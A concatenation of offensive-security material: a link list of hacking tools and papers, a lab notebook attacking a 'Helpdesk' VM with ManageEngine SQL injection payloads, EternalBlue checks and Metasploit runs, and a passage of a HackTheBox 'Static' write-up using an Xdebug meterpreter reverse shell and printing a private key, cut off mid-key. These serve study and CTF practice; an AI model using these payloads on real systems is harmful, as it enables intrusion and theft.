https://github.com/corkami/mitra
https://github.com/msrkp/PPScan
https://github.com/obheda12/GitDorker
https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet
https://github.com/Shopify/bugbounty-resources
https://github.com/arthaud/git-dumper
https://github.com/doyensec/inql
https://github.com/ffuf/pencode
https://github.com/projectdiscovery/interactsh
https://github.com/synacktiv/HopLa
https://github.com/ffuf/pencode
https://github.com/dwisiswant0/apkleaks
https://github.com/Lookyloo/lookyloo
https://github.com/doyensec/regexploit
https://github.com/p1g3/JSINFO-SCAN
https://github.com/swisskyrepo/GraphQLmap
https://github.com/stark0de/nginxpwner
https://github.com/nahamsec/recon_profile
https://github.com/gwen001/github-subdomains
https://github.com/tarunkant/Gopherus
https://github.com/0ang3el/websocket-smuggle
https://github.com/lc/230-OOB
https://github.com/nikitastupin/clairvoyance
## Videos & Conferences
[DEF CON Safe Mode Red Team Village - Ray Doyle - Weaponized XSS Moving Beyond Alert](https://www.youtube.com/watch?v=ksq7e6UUDag&ab_channel=DEFCONConference)
[XML Object Exfiltration - HackTheBox Cyber Apocalypse CTF "E. Tree"](https://www.youtube.com/watch?v=ySJwlMsFbco&ab_channel=JohnHammond)
[Exploiting Tomcat with LFI & Container Privesc - "Tabby" HackTheBox](https://www.youtube.com/watch?v=UQOJOFWjQr0&ab_channel=JohnHammond)
[XSS a Paste Service - Pasteurize (web) Google CTF 2020](https://www.youtube.com/watch?v=Tw7ucd2lKBk&ab_channel=LiveOverflow)
[Practical Attacks Using HTTP Request Smuggling by @defparam #NahamCon2020](https://www.youtube.com/watch?v=3tpnuzFLU8g&ab_channel=Nahamsec)
[HTTP Desync Attacks: Smashing into the Cell Next Door - DEF CON 27 Conference](https://www.youtube.com/watch?v=w-eJM2Pc0KI&ab_channel=DEFCONConference)
[You've Got Pwned: Exploiting E-Mail Systems by @securinti #NahamCon2020!](https://www.youtube.com/watch?v=cThFNXrBYQU&list=PLKAaMVNxvLmAD0ZVUJ2IGFFC0APFZ5gzy&index=3&ab_channel=Nahamsec)
[JWT jku&x5u = ❤️ by @snyff #NahamCon2020](https://www.youtube.com/watch?v=VA1g7YV8HkI&list=PLKAaMVNxvLmAD0ZVUJ2IGFFC0APFZ5gzy&index=11&ab_channel=Nahamsec)
[SMTP Access via SSRF in HackerTarget API](https://www.youtube.com/watch?v=F_sC_OrSkIc&ab_channel=CorbenLeo)
## Books
[Real-World Bug Hunting: A Field Guide to Web Hacking](https://www.amazon.com/Real-World-Bug-Hunting-Field-Hacking/dp/1593278616/)
[The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws](https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470/)
[Web Application Obfuscation](https://www.amazon.com/Web-Application-Obfuscation-Evasion-Filters/dp/1597496049) (There is useful information but it's a very old book.)
[The Tangled Web: A Guide to Securing Modern Web Applications](https://www.amazon.com/Tangled-Web-Securing-Modern-Applications/dp/1593273886) (In Progress)
## Academic/Conference Papers
[The Perl Jam2](https://www.blackhat.com/docs/asia-16/materials/asia-16-Rubin-The-Perl-Jam-2-The-Camel-Strikes-Back.pdf)
[Breaking Parser Logic!](https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf)
[Security Evaluation on Amazon Web Services'REST API Authentication Protocol Signature Version 4](https://www.delaat.net/rp/2019-2020/p65/report.pdf)
[HTTP Request Smuggling](http://forum.ouah.org/HTTP-Request-Smuggling.pdf)
[Nemesis: Preventing Authentication & Access Control Vulnerabilities in Web Applications](https://static.usenix.org/events/sec09/tech/full_papers/dalton.pdf)
[SWAP: Mitigating XSS attacks using a reverse proxy](https://ieeexplore.ieee.org/abstract/document/5068456)
[DOM Based Cross Site Scripting or XSS of the Third Kind](https://docs.gnet0.com/ebooks/XSS/DOM%20Based%20Cross%20Site%20Scripting%20or%20XSS%20of%20the%20Third%20Kind.pdf)
[Path sensitive static analysis of web applications for remote code execution vulnerability detection](https://ieeexplore.ieee.org/abstract/document/6606611)
[PHP-sensor: a prototype method to discover workflow violation and XSS vulnerabilities in PHP web applications](https://dl.acm.org/doi/abs/10.1145/2742854.2745719)
[A Study on Remote Code Execution Vulnerability in Web Applications](http://indexive.com/uploads/papers/pap_indexive15506771062147483647.pdf)
[XML Schema, DTD, and Entity Attacks](https://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf)
[A Privacy-Preserving Defense Mechanism against Request Forgery Attacks](https://ieeexplore.ieee.org/abstract/document/6120802)
[Formal Analysis of the Kaminsky DNS Cache-Poisoning Attack Using Probabilistic Model Checking](https://ieeexplore.ieee.org/abstract/document/5634315)
[A New WAF-Based Architecture for Protecting Web Applications Against CSRF Attacks in Malicious Environment](https://ieeexplore.ieee.org/abstract/document/8511151)
[Flash security & Advanced CSRF](https://owasp.org/www-pdf-archive/FLASH_Security.pdf)
[HTTP Strict Transport Security](https://www.hjp.at/doc/rfc/rfc6797.html)
[XXE Attacks](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20XML%20External%20Entity%20Attacks%20(XXE)%20-%20owasp.pdf)
[Common Security Problems in the Code of Dynamic Web Applications](http://www.webappsec.org/projects/articles/062105.pdf)
[Known XML Vulnerabilities Are Still a Threat to Popular Parsers and Open Source Systems](https://ieeexplore.ieee.org/abstract/document/7272938)
[Jackson Deserialization Vulnerabilities](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)
[Abusing Hidden Properties to Attack the Node.js Ecosystem](https://www.usenix.org/system/files/sec21fall-xiao.pdf)
[Welcome to the NetSPI SQL Injection Wiki!](https://sqlwiki.netspi.com/) (In Progress)
[A Study of Out-of-Band Structured Query Language Injection](https://zenodo.org/record/3556347/files/A%20Study%20of%20Out-of-Band%20SQL%20Injection.pdf?download=1) (In Progress)
[Practical Web Cache Poisoning: Redefining 'Unexploitable](https://portswigger.net/kb/papers/7q1e9u9a/web-cache-poisoning.pdf)
[OAuth 2.0 Security Best Current Practice](https://tools.ietf.org/id/draft-ietf-oauth-security-topics-15.html#name-copyright-notice)
[Server-Side Template Injection: RCE for the modern webapp](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
## Penetration Testing
[The Open Source Security Testing Methodology Manuel (OSSTMM 3)](https://www.isecom.org/OSSTMM.3.pdf) (In Progress)
## CheatSheet & Tips
[OAUTH 2.0 Pentest](https://6fb807dad1e77cc7bf259fa4.s3.us-east-2.amazonaws.com/Oauth2.0_Security_Testing_Mindmap.png)
[Admin Panel PWN](https://twitter.com/hunter0x1/status/1395250783977762819)
[Android Application Penetration Testing Checklist](https://www.xmind.net/m/paUMuU/)
|
# Helpdesk
## Table of Contents
* [Summary](#summary)
* [Enumerate](#enumerate)
* [Ports](#ports)
* [Services](#services)
* [RPC](#rpc)
* [NetBIOS](#netbios)
* [SMB](#smb)
* [RDP](#rdp)
* [Exploit](#exploit)
* [Metasploit](#metasploit)
* [Explore](#explore)
* [Escalate](#escalate)
* [Effect](#effect)
## Summary
* Hostname: HELPDESK
* IP address: 192.168.107.43
* MAC address: 00:50:56:bf:f2:74 (ref: nbtscan)
* Domain:
* TCP Ports and Services
* 135
* MSRPC
* 139
* NetBIOS
* 445
* SMB
* 3389
* RDP
* 8080
* MySQL 4.1.18-pro-nt (ref: SQL injection)
* Tomcat 5.0.28
* JBoss 3.2.6
* ManageEngine 7.6.0
* OS
* Distro: Windows Server 2008 SP1 (ref: rdesktop)
* Kernel: (ref:)
* Users (ref: Home > Scheduler > Groups, Technicians; Admin > Technicians)
* administrator
* guest
* Jeniffer Doe (hardware, network, printers)
* Kevin Yang (hardware, network)
* Howard Stern (network)
* John Roberts
* Shawn Adams
* Vulnerabilities
* EDB-ID-11793: SQL injection (ref: searchsploit)
* EDB-ID-46431: Arbitrary File Upload (ref: searchsploit)
* CVE-2014-5301: Arbitrary File Upload (ref: searchsploit)
* CVE-????-????: (MS17-010)
* CVE-2009-3103: SMBv2 Command Value Vulnerability (MS09-050)
* Exploits
* EDB-ID-46431
* Metasploit `multi/http/manageengine_auth_upload`
* Flag
* d0b266cfbf574417258f2e135b545975
* Hints
* RC1 (-3): Enumerate the version of the web application. The exploit requires credentials, but they should not be hard to find.
* RC2 (-2): Find the version of the operating system. There is an easy exploit for it.
# Enumerate
```bash
TARGET=192.168.107.43
NAME=helpdesk
mkdir $NAME
mkdir $NAME/exploits
mkdir $NAME/loot
mkdir $NAME/scans
mkdir $NAME/screenshots
sudo save-screenshots-here $NAME/screenshots
cd $NAME
```
## Ports
```bash
sudo nmap $TARGET -sS -sU --min-rate 1000 -oN scans/$NAME-nmap-initial
sudo nmap $TARGET -sS -sU -p- --min-rate 1000 -oN scans/$NAME-nmap-complete
sudo nmap $TARGET -sV $(print-open-ports-from-nmap-scan scans/$NAME-nmap-complete) -oN scans/$NAME-nmap-versions
# output
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-20 19:15 EDT
Nmap scan report for 192.168.107.43
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ms-wbt-server Microsoft Terminal Service
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
Service Info: Host: HELPDESK; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.92 seconds
```
```bash
sudo nmap 192.168.208.43 -sC -oN helpdesk-nmap-scripts
# output
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-21 12:52 EDT
Nmap scan report for 192.168.208.43
Host is up (0.076s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
8080/tcp open http-proxy
| http-cookie-flags:
| /:
| JSESSIONID:
|_ httponly flag not set
|_http-title: ManageEngine ServiceDesk Plus
Host script results:
|_clock-skew: mean: 2h19m59s, deviation: 4h02m29s, median: 0s
|_nbstat: NetBIOS name: HELPDESK, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:bf:db:0a (VMware)
| smb-os-discovery:
| OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: HELPDESK
| NetBIOS computer name: HELPDESK\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-06-21T09:53:03-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-06-21T16:53:03
|_ start_date: 2021-06-21T16:04:20
Nmap done: 1 IP address (1 host up) scanned in 47.00 seconds
```
## Services
### HTTP
```bash
dirb http://$TARGET -r -z10 -o scans/$NAME-dirb
# output
NSTR
```
```bash
nikto -h $TARGET -T 2 -Format txt -o scans/$NAME-nikto-misconfig
# output
NSTR
```
### RPC
```bash
rpcclient -U '' $TARGET
# output
Enter WORKGROUP\'s password:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
```
### NetBIOS
```bash
nbtscan $TARGET
# output
Doing NBT name scan for addresses from 192.168.107.43
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.107.43 HELPDESK <server> <unknown> 00:50:56:bf:f2:74
```
### SMB
```bash
smbclient -L $TARGET
# output
Enter WORKGROUP\victor's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
```
```bash
smbmap -H 192.168.107.43
# output
[+] IP: 192.168.107.43:445 Name: 192.168.107.43
```
```bash
sudo nmap 192.168.107.43 -p445 --script smb-vuln-ms17-010 -oN scans/helpdesk-nmap-scripts-smb-vuln-ms17-010
# output
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-20 19:52 EDT
Nmap scan report for 192.168.107.43
Host is up (0.078s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 1.18 seconds
```
### RDP
```bash
sudo nmap 192.168.107.43 -p3389 --script rdp-ntlm-info -oN scans/helpdesk-nmap-scripts-rdp-ntlm-info
# output
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-20 19:36 EDT
Nmap scan report for 192.168.107.43
Host is up (0.075s latency).
PORT STATE SERVICE
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds
```
# Exploit
```bash
firefox http://192.168.107.43:8080
# administrator:administrator
```
### ManageEngine 7.9 SQL injection
The code below copies the exploit information for a possible vulnerability. The exploit is a SQL injection attack.
```bash
searchsploit -m 11793
firefox http://192.168.208.43:8080 + SQLi
firefox http://192.168.208.43:8080/images/ + filename_from_SQLi
```
First, I started Burp Suite and configured my browser to sent all web requests to it. Then, I browsed to `http://192.168.208.43:8080/WorkOrder.do?woMode=viewWO&WorkOrder.WORKORDERID=1` and sent the request captured to Repeater. Using Repeater, I replaced the POST request with the SQL queries below. I enumerated the number of columns for the impacted table.
```bash
/WorkOrder.do?woMode=viewWO&woID=WorkOrder.WORKORDERID=1)%20ORDER%20BY%201/*
# output
# No error
/WorkOrder.do?woMode=viewWO&woID=WorkOrder.WORKORDERID=1)%20ORDER%20BY%2021/*
# output
# Error...meaning there are 20 columns in the impacted table. The exploit uses column 9 to stuff data.
/WorkOrder.do?woMode=viewWO&woID=WorkOrder.WORKORDERID=1)%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
# output (a.k.a junk, use to delineate baseline text from extracted data)
# 1301316242931519120-100Test�������51-11234567811121314151617181920
# MySQL version
/WorkOrder.do?woMode=viewWO&woID=WorkOrder.WORKORDERID=1)%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat("---",@@version,"---")%20INTO%20DUMPFILE%20'C:\\ManageEngine\\ServiceDesk\\applications\\extracted\\AdventNetServiceDesk.eear\\AdventNetServiceDeskWC.ear\\AdventNetServiceDesk.war\\images\\version.html'/*
# output
# 4.1.18-pro-nt10
# Database name
/WorkOrder.do?woMode=viewWO&woID=WorkOrder.WORKORDERID=1)%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat("---",database(),"---")%20INTO%20DUMPFILE%20'C:\\ManageEngine\\ServiceDesk\\applications\\extracted\\AdventNetServiceDesk.eear\\AdventNetServiceDeskWC.ear\\AdventNetServiceDesk.war\\images\\database.html'/*
# output
# servicedesk
# Table names
/WorkOrder.do?woMode=viewWO&woID=WorkOrder.WORKORDERID=1)%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat("---",(SHOW%20tables),"---")%20FROM%20information_schema.columns%20INTO%20DUMPFILE%20'C:\\ManageEngine\\ServiceDesk\\applications\\extracted\\AdventNetServiceDesk.eear\\AdventNetServiceDeskWC.ear\\AdventNetServiceDesk.war\\images\\tables.html'/*
# output
#
# User name
/WorkOrder.do?woMode=viewWO&woID=WorkOrder.WORKORDERID=1)%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat("---",user,"---")%20FROM%20mysql.user%20INTO%20DUMPFILE%20'C:\\ManageEngine\\ServiceDesk\\applications\\extracted\\AdventNetServiceDesk.eear\\AdventNetServiceDeskWC.ear\\AdventNetServiceDesk.war\\images\\user.html'/*
# output
# root
# Password
/WorkOrder.do?woMode=viewWO&woID=WorkOrder.WORKORDERID=1)%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat("---",password,"---")%20FROM%20mysql.user%20INTO%20DUMPFILE%20'C:\\ManageEngine\\ServiceDesk\\applications\\extracted\\AdventNetServiceDesk.eear\\AdventNetServiceDeskWC.ear\\AdventNetServiceDesk.war\\images\\password.html'/*
# output
# (none)
```
### EternalBlue
Downloading the exploit.
```bash
wget https://github.com/worawit/MS17-010.git
cd MS17-010
pip install impacket
```
Checking if the target is vulnerable - it is, but Windows Vista+ does not allow anonymous users to access Named Pipes.
```bash
python checker.py 192.168.107.43
# output
Target OS: Windows Server (R) 2008 Standard 6001 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_OBJECT_NAME_NOT_FOUND
```
### Metasploit
multi/http/manageengine_auth_upload
```bash
msfconsole
search manageengine 7
use multi/http/manageengine_auth_upload
set USERNAME administrator
set PASSWORD administrator
set RHOST 192.168.54.43
set LHOST tun0
run
shell
whoami
cd C:\Users\Administrator\Desktop\
type proof.txt
```
exploit/windows/smb/ms09_050_smb2_negotiate_func_index
```bash
msfconsole
search ms09_050 # target was running Server 2008 SP1 32-bit
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOST 192.168.54.43
set LHOST tun0
run # and wait 180 seconds
shell
whoami
cd C:\Users\Administrator\Desktop\
type proof.txt
```
# Explore
# Escalate
# Effect
|
# Static - HackTheBox - Writeup
Linux, 30 Base Points, Medium
## Machine
![Static.JPG](images/Static.JPG)
## TL;DR
To solve this machine, we begin by enumerating open services using ```namp``` – finding ports ```22```, ```2222``` and ```8080```.
***User***: On ```robots.txt``` file we found two URL's [/vpn] and [ftp_uploads], Download ```db.sql.gz``` file from the FTP, Fixed the corrupted file using ```fixgz```, On the fixed file we found the hash of the admin credentials to [/vpn] portal, Create OTP and log in as admin to the [/vpn] portal, From the VPN portal we download the ```web.ovpn``` file, Using that, We can access to the [web] website, Found file ```info.php``` which lead us to PHPInfo page, We found there ```Xdebug``` PHP extension which lead us to RCE, Using that we get a user ```www-data``` shell.
***Root***:
![pwn.JPG](images/pwn.JPG)
## Static Solution
### User
Let's start with ```nmap``` scanning:
```console
┌─[evyatar@parrot]─[/hackthebox/Static]
└──╼ $ nmap -sV -sC -oA nmap/Static 10.10.10.246
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-30 22:11 IDT
Unable to split netmask from target expression: "nmap/Static"
Nmap scan report for 10.10.10.246
Host is up (0.19s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 16:bb:a0:a1:20:b7:82:4d:d2:9f:35:52:f4:2e:6c:90 (RSA)
| 256 ca:ad:63:8f:30:ee:66:b1:37:9d:c5:eb:4d:44:d9:2b (ECDSA)
|_ 256 2d:43:bc:4e:b3:33:c9:82:4e:de:b6:5e:10:ca:a7:c5 (ED25519)
2222/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:a4:5c:e3:a9:05:54:b1:1c:ae:1b:b7:61:ac:76:d6 (RSA)
| 256 c9:58:53:93:b3:90:9e:a0:08:aa:48:be:5e:c4:0a:94 (ECDSA)
|_ 256 c7:07:2b:07:43:4f:ab:c8:da:57:7f:ea:b5:50:21:bd (ED25519)
8080/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 2 disallowed entries
|_/vpn/ /.ftp_uploads/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
By observing port ```8080``` we get a blank page.
By browsing to [http://10.10.10.246:8080/robots.txt](http://10.10.10.246:8080/robots.txt) we get:
![robots.JPG](images/robots.JPG)
Where [http://10.10.10.246:8080/vpn/login.php](http://10.10.10.246:8080/vpn/login.php) web page contains:
![vpn.JPG](images/vpn.JPG)
And [http://10.10.10.246:8080/.ftp_uploads/](http://10.10.10.246:8080/.ftp_uploads/) web page contains:
![ftpupload.JPG](images/ftpupload.JPG)
Let's download those files.
```warning.txt``` file contains the following text:
>Binary files are being corrupted during transfer!!! Check if are recoverable.
And when we are trying to ```gunzip``` the ```db.sql.gz``` file we get:
```console
┌─[evyatar@parrot]─[/hackthebox/Static]
└──╼ $gunzip db.sql.gz
gzip: db.sql.gz: invalid compressed data--crc error
gzip: db.sql.gz: invalid compressed data--length error
```
Like the message on ```warning.txt``` says.
Let's try to fix the ```gz``` file using [fixgz](https://github.com/yonjar/fixgz).
First, Let's compile ```fixgz``` using ```gcc```:
```console
┌─[evyatar@parrot]─[/hackthebox/Static/fixgz]
└──╼ $ gcc fixgz.cpp -o fixgz
```
And then. Let's run it with the corrupted file as input:
```console
┌─[evyatar@parrot]─[/hackthebox/Static/fixgz]
└──╼ $ ./fixgz ../db.sql.gz fixed.gz
ls
┌─[evyatar@parrot]─[/hackthebox/Static/fixgz]
└──╼ $ fixed.gz fixgz fixgz.cpp fixgz.exe README.md
```
```fixgz``` created a new fixed file called ```fixed.gz```, Let's ```gunzip``` the fixed file:
```console
┌─[evyatar@parrot]─[/hackthebox/Static/fixgz]
└──╼ $ gunzip fixed.gz
┌─[evyatar@parrot]─[/hackthebox/Static/fixgz]
└──╼ $ cat fixed
CREATE DATABASE static;
USE static;
CREATE TABLE users ( id smallint unsigned not null auto_increment, username varchar(20) not null, password varchar(40) not null, totp varchar(16) not null, primary key (id) );
INSERT INTO users ( id, username, password, totp ) VALUES ( null, 'admin', 'd033e22ae348aeb5660fc2140aec35850c4da997', 'orxxi4c7orxwwzlo' );
```
By cracking the hash ```d033e22ae348aeb5660fc2140aec35850c4da997``` using ```john``` we get ```admin```.
So the credentials are ```admin:admin```.
Next, We need to create ```OTP``` for ```OTP``` password ```orxxi4c7orxwwzlo```, To do so we can use [Authenticator](https://addons.mozilla.org/en-US/firefox/addon/auth-helper/) extension.
First, Let's log in to the portal:
![login.JPG](images/login.JPG)
Now, We need to generate the ```OTP``` password:
![otp.JPG](images/otp.JPG)
Let's generate it:
![authenticator.JPG](images/authenticator.JPG)
NOTE: If your timezone Isn't syncing with the server time - run the following command to get ```OTP```:
```console
┌─[evyatar@parrot]─[/hackthebox/Static]
└──╼ $ sudo date -s "`curl -ski http://10.10.10.246:8080/ | sed -n '/^Date/s/^Date: //gp' | tee /dev/tty`"; date -u; oathtool -b --totp 'orxxi4c7orxwwzlo'
Sun, 31 Oct 2021 21:22:06 GMT
Sun 31 Oct 2021 11:22:06 PM IST
Sun 31 Oct 2021 09:22:06 PM UTC
231803
```
And now we get into the following portal:
![panel.JPG](images/panel.JPG)
Let's download all VPN's as follows:
![vpndownload.JPG](images/vpndownload.JPG)
Now, When we are trying to use it we get the following error:
```console
┌─[evyatar@parrot]─[/hackthebox/Static]
└──╼ $ sudo openvpn web.ovpn
[sudo] password for user:
Sun Oct 31 23:47:57 2021 OpenVPN 2.4.9 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Apr 21 2020
Sun Oct 31 23:47:57 2021 library versions: OpenSSL 1.1.1k 25 Mar 2021, LZO 2.10
Sun Oct 31 23:47:57 2021 Outgoing Control Channel Authentication: Using 160 bit message hash 'SHA1' for HMAC authentication
Sun Oct 31 23:47:57 2021 Incoming Control Channel Authentication: Using 160 bit message hash 'SHA1' for HMAC authentication
Sun Oct 31 23:47:57 2021 RESOLVE: Cannot resolve host address: vpn.static.htb:1194 (Name or service not known)
Sun Oct 31 23:47:57 2021 RESOLVE: Cannot resolve host address: vpn.static.htb:1194 (Name or service not known)
Sun Oct 31 23:47:57 2021 Could not determine IPv4/IPv6 protocol
Sun Oct 31 23:47:57 2021 NOTE: UID/GID downgrade will be delayed because of --client, --pull, or --up-delay
Sun Oct 31 23:47:57 2021 SIGUSR1[soft,init_instance] received, process restarting
Sun Oct 31 23:47:57 2021 Restart pause, 5 second(s)
```
As we can see - It Isn't found the host ```vpn.static.htb```, Let's add it to ```/etc/hosts``` and try again:
```console
┌─[evyatar@parrot]─[/hackthebox/Static]
└──╼ $ sudo openvpn web.ovpn
Sun Oct 31 23:51:16 2021 OpenVPN 2.4.9 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Apr 21 2020
...
Sun Oct 31 23:51:18 2021 Initialization Sequence Completed
```
We have a new interface:
```console
┌─[evyatar@parrot]─[/hackthebox/Static]
└──╼ $ ifconfig tun9
tun9: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 172.30.0.9 netmask 255.255.0.0 destination 172.30.0.9
inet6 fe80::2216:6c36:2570:970c prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 100 (UNSPEC)
RX packets 1 bytes 40 (40.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 7 bytes 348 (348.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions
```
When we are trying to access to ```web``` on [http://172.20.0.10](http://172.20.0.10) It's still not working.
We have the IP ```172.30.0.9``` and the IP of the web page we want to access is ```172.20.0.10```
We need to add the route for access the web page in ```tun9``` interface as follows:
```console
┌─[evyatar@parrot]─[/hackthebox/Static]
└──╼ $ ip route add 172.20.0.0/24 dev tun9
```
And now we can access to [http://172.20.0.10](http://172.20.0.10):
![webvpn.JPG](images/webvpn.JPG)
By browsing to ```phpinfo.php``` we can see the following:
![xdebug.JPG](images/xdebug.JPG)
We can see the ```Xdebug``` - where ```Xdebug``` is a PHP extension that allows debugging PHP pages, remotely by using ```DGBp protocol```.
Code execution is possible via injections that exist in ```eval``` or ```property_set``` xdebug commands.
We can use the following [metasploit xdebug_unauth_exec](https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/) to get RCE:
```console
msf6 exploit(unix/http/xdebug_unauth_exec) > options
Module options (exploit/unix/http/xdebug_unauth_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PATH /vpn/login.php yes Path to target webapp
Proxies no A proxy chain of format type:host:port[,type:host:po
rt][...]
RHOSTS 172.20.0.10 yes The target host(s), see https://github.com/rapid7/me
tasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes Callback host for accepting connections
SRVPORT 9000 yes Port to listen for the debugger
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST tun9 yes The listen address (an interface may be specified)
LPORT 9001 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/http/xdebug_unauth_exec) > run
[*] Started reverse TCP handler on 172.30.0.9:9001
[*] 172.20.0.10:80 - Waiting for client response.
[*] 172.20.0.10:80 - Receiving response
[*] 172.20.0.10:80 - Shell might take upto a minute to respond.Please be patient.
[*] 172.20.0.10:80 - Sending payload of size 2026 bytes
[*] Sending stage (39282 bytes) to 172.30.0.1
[*] Meterpreter session 2 opened (172.30.0.9:9001 -> 172.30.0.1:53424) at 2021-06-21 00:56:43 -0500
meterpreter > shell
Process 381 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
And now Let's get the SSH private key of ```www-data```:
```console
cat /home/www-data/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA0pNa5qwGZ+DKsS60GPhNfCqZti7z1xPzxOTXwtwO9uYzZpq/
nrhzgJq0nQNVRUbaiZ+H6gR1OreDyjr9YorV2kJqccscBPZ59RAhttaQsBqHkGjJ
QEHYKteL1D+hJ80NDd7fJTtQgzT4yBDwrVKwIUSETMfWgzJ5z24LN5s/rcQYgl3i
VKmls3lsod8ilakdDoYEYt12L4ST/exEoVl0AyD9y8m651q40k1Gz4WzPnaHAlnj
mL6CANfiNAJoc8WnqZN5ruSrWhmivmDbKLlDCO5bCCzi2zMHJKqQkcBxdWk60Qhi
17UJMV3mKVQRprvpeTR2jCMykH81n2KU46doSQIDAQABAoIBAADCHxWtkOhW2uQA
cw2T91N3I86QJLiljb8rw8sj17nz4kOAUyhTKbdQ102pcWkqdCcCuA6TrYhkmMjl
pXvxXAvJKXD3dkZeTNohEL4Dz8mSjuJqPi9JDWo6FHrTL9Vg26ctIkiUChou2qZ9
ySAWqCO2h3NvVMpsKBwjHU858+TASlo4j03FJOdmROmUelcqmRimWxgneHBAHEZj
GqDuPjmPmw7pbThqlETyosrbaB3rROzUp9CKAHzYB1BvOTImDsb6qQ+GdKwewAQf
j60myPuxl4qgY8O2yqLFUH3/ovtPTKqHJSUFBO23wzS1qPLupzu1GVXwlsdlhRWA
